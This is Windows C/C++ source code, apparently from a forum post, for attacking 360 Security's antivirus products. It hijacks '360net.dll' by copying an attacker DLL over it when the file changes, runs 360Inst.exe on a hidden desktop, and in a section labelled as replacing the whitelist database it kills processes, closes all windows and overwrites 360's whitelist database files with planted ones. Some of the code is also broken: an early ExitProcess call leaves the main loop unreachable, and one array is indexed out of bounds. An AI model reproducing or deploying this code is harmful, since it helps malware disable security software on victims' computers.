HINSTANCE hInstance = NULL;
DWORD WINAPI MainBacak(LPVOID lpParameter)
{
SetPriorityClass( GetCurrentProcess(), HIGH_PRIORITY_CLASS );
char MydirPath[MAX_PATH];
SHGetSpecialFolderPath(NULL,MydirPath,CSIDL_PROFILE,0);
CHAR MyDir[MAX_PATH];
wsprintf(MyDir,"%s\\Local Settings\\Temp\\",MydirPath);
const int buf_size = 1024;
CHAR buf[buf_size];
DWORD dwBufWrittenSize;
HANDLE hDir;
hDir = CreateFile(MyDir, FILE_LIST_DIRECTORY,FILE_SHARE_READ|FILE_SHARE_DELETE,NULL,OPEN_EXISTING,FILE_FLAG_BACKUP_SEMANTICS, NULL);
if (hDir == INVALID_HANDLE_VALUE)
{
CloseHandle(hDir);
exit(0);
}
while(1)
{
if(ReadDirectoryChangesW(hDir, &buf, buf_size, TRUE ,
FILE_NOTIFY_CHANGE_FILE_NAME|
FILE_NOTIFY_CHANGE_DIR_NAME|
FILE_NOTIFY_CHANGE_ATTRIBUTES|
FILE_NOTIFY_CHANGE_SIZE|
FILE_NOTIFY_CHANGE_LAST_WRITE|
FILE_NOTIFY_CHANGE_LAST_ACCESS|
FILE_NOTIFY_CHANGE_CREATION|
FILE_NOTIFY_CHANGE_SECURITY,
&dwBufWrittenSize, NULL, NULL))
{
FILE_NOTIFY_INFORMATION * pfiNotifyInfo = (FILE_NOTIFY_INFORMATION*)buf;
char* pszMultiByte;
pszMultiByte = new char[512];
ZeroMemory( pszMultiByte, 512);
WideCharToMultiByte(CP_ACP, 0,pfiNotifyInfo->FileName, pfiNotifyInfo->FileNameLength/2, pszMultiByte, 512, NULL, NULL);
char *p;
p=strstr(pszMultiByte,"360net.dll");
if(p!=NULL)
{
char tmp360net[MAX_PATH]={0};
lstrcpy(tmp360net,pszMultiByte);
switch(pfiNotifyInfo->Action)
{
case FILE_ACTION_ADDED:
delete []pszMultiByte;
break;
case FILE_ACTION_REMOVED:
delete []pszMultiByte;
break;
case FILE_ACTION_MODIFIED:
lstrcat(MyDir,tmp360net);
if (CopyFile("Dll.dll",MyDir,FALSE)!=0)
{
delete []pszMultiByte;
CloseHandle(hDir);
return 1;
}
else
{
delete []pszMultiByte;
return 0;
break;
}
default:
break;
}
}
}
}
CloseHandle(hDir);
return 0;
}
DWORD WINAPI MainDesk(LPVOID lpParameter)
{
HDESK hDesk = CreateDesktop("Virtual",
NULL,
NULL,
DF_ALLOWOTHERACCOUNTHOOK,
DESKTOP_CREATEWINDOW|
DESKTOP_ENUMERATE|
DESKTOP_READOBJECTS|
DESKTOP_WRITEOBJECTS|
DESKTOP_HOOKCONTROL ,
NULL
);
STARTUPINFO si = {sizeof(si)};
si.lpDesktop = "Virtual";
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
PROCESS_INFORMATION pi = {0};
if(!CreateProcess(NULL,(LPSTR)(LPCSTR)lpParameter, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
{
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
CloseDesktop(hDesk);
return 0;
}
return 1;
}
int main(int argc, char* argv[])
{
char safe[MAX_PATH];
HKEY hkey;
DWORD type = REG_SZ;
DWORD buffSize=sizeof(safe);
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
RegCloseKey(hkey);
}
else
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
RegCloseKey(hkey);
}
}
char tmp360safe[MAX_PATH]={0};
lstrcpy(tmp360safe,safe);
lstrcat(tmp360safe,"\\modules\\360Inst.exe");
char MyDir[MAX_PATH];
SHGetSpecialFolderPath(NULL,MyDir,CSIDL_PROFILE,0);
strcat(MyDir,"\\Local Settings\\Temp\\");
MessageBox(NULL,MyDir,NULL,NULL);
ExitProcess(0);
if (access(tmp360safe,0)==0)
{
while(1)
{
HANDLE handle[2];
handle[1]=CreateThread(NULL,NULL,MainBacak,NULL,CREATE_SUSPENDED,NULL);
SetThreadPriority(handle[1],THREAD_PRIORITY_HIGHEST);
ResumeThread(handle[1]);
handle[2]=CreateThread(NULL,NULL,MainDesk,tmp360safe,CREATE_SUSPENDED,NULL);
SetThreadPriority(handle[2],THREAD_PRIORITY_LOWEST);
ResumeThread(handle[2]);
WaitForSingleObject(handle[2],INFINITE);
DWORD lpExitCode2;
GetExitCodeThread(handle[2],&lpExitCode2);
if (lpExitCode2==0)
{
CloseHandle(handle[2]);
CloseHandle(handle[1]);
continue;
}
WaitForSingleObject(handle[1],INFINITE);
DWORD lpExitCode;
GetExitCodeThread(handle[1],&lpExitCode);
if (lpExitCode==1)
{
CloseHandle(handle[1]);
CloseHandle(handle[2]);
Sleep(15000);
}
else
{
CloseHandle(handle[1]);
CloseHandle(handle[2]);
}
}
}
return 0;
}
替换白名单数据库部分:
int Storm(int count)
{
unsigned long Time=GetTickCount();
int seed=rand()+3;
seed=(seed*Time)%count;
return seed;
}
BOOL CALLBACK EnumWindowsProc(HWND hwnd,LPARAM IParam)//回调函数
{
PostMessage(hwnd, WM_CLOSE, 0, 0);
return TRUE;
}
extern "C" __declspec(dllexport)void HttpCreateDownloadObj()
{
char taskkill[MAX_PATH];
wsprintf(taskkill,"taskkill /im load.exe /f");
WinExec(taskkill,SW_HIDE);
EnumWindows(EnumWindowsProc,0);
char safe[MAX_PATH];
char SD[MAX_PATH];
HKEY hkey;
DWORD type = REG_SZ;
DWORD buffSize=sizeof(safe);
DWORD buffSize1=sizeof(SD);
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
RegCloseKey(hkey);
}
else
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)safe,&buffSize);
RegCloseKey(hkey);
}
}
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360sd.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)SD,&buffSize1);
RegCloseKey(hkey);
}
else
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360sd.exe",NULL,KEY_READ,&hkey)==ERROR_SUCCESS)
{
RegQueryValueEx(hkey,"Path",NULL,&type,(LPBYTE)SD,&buffSize1);
RegCloseKey(hkey);
}
}
char tmp360safe[MAX_PATH]={0};
lstrcpy(tmp360safe,safe);
lstrcat(tmp360safe,"\\modules\\360Inst.exe");
char MydirPath[MAX_PATH];
SHGetSpecialFolderPath(NULL,MydirPath,CSIDL_PROFILE,0);
CHAR MyDir[MAX_PATH];
wsprintf(MyDir,"%s\\Local Settings\\Temp\\",MydirPath);
CHAR speedmem[MAX_PATH];
wsprintf(speedmem,"%s\\sp%cedm%cm.hg",MyDir,'a'+Storm(26),'a'+Storm(26));
CHAR slD[MAX_PATH];
wsprintf(slD,"%s\\s%cefmm%c.ds",MyDir,'a'+Storm(26),'a'+Storm(26));
speedmemSaveFile(speedmem);
sdSaveFile(slD);
CHAR Newspeedmem[MAX_PATH];
wsprintf(Newspeedmem,"%s\\deepscan\\speedmem2.hg",safe);
CHAR NewslD[MAX_PATH];
wsprintf(NewslD,"%s\\sl2.db",SD);
DeleteFile(Newspeedmem);
DeleteFile(NewslD);
CopyFile(speedmem,Newspeedmem,FALSE);
CopyFile(slD,NewslD,FALSE);
DeleteFile(speedmem);
DeleteFile(slD);
return;
}
- 1
- 2
前往页